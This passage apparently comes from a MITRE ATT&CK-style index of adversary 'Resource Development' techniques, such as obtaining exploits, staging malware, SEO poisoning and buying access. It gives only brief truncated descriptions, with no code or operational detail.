Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the …
T1588.005
Resource Development: Exploits
Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to …
T1588.006
Resource Development: Vulnerabilities
Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, …
T1588.007
Resource Development: Artificial Intelligence
Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be …
T1608
Resource Development: Stage Capabilities
Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To support their operations, an adversary may need to take …
T1608.001
Resource Development: Upload Malware
Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, …
T1608.002
Resource Development: Upload Tool
Adversaries may upload tools to third-party or adversary controlled infrastructure to make it accessible during targeting. Tools can be open or closed source, free or …
T1608.003
Resource Development: Install Digital Certificate
Adversaries may install SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are files that can be installed on servers to enable secure communications …
T1608.004
Resource Development: Drive-by Target
Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through …
T1608.005
Resource Development: Link Target
Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user …
T1608.006
Resource Development: SEO Poisoning
Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users …
T1650
Resource Development: Acquire Access
Adversaries may purchase or otherwise acquire an existing access to a target system or network. A variety of online services and initial access broker networks …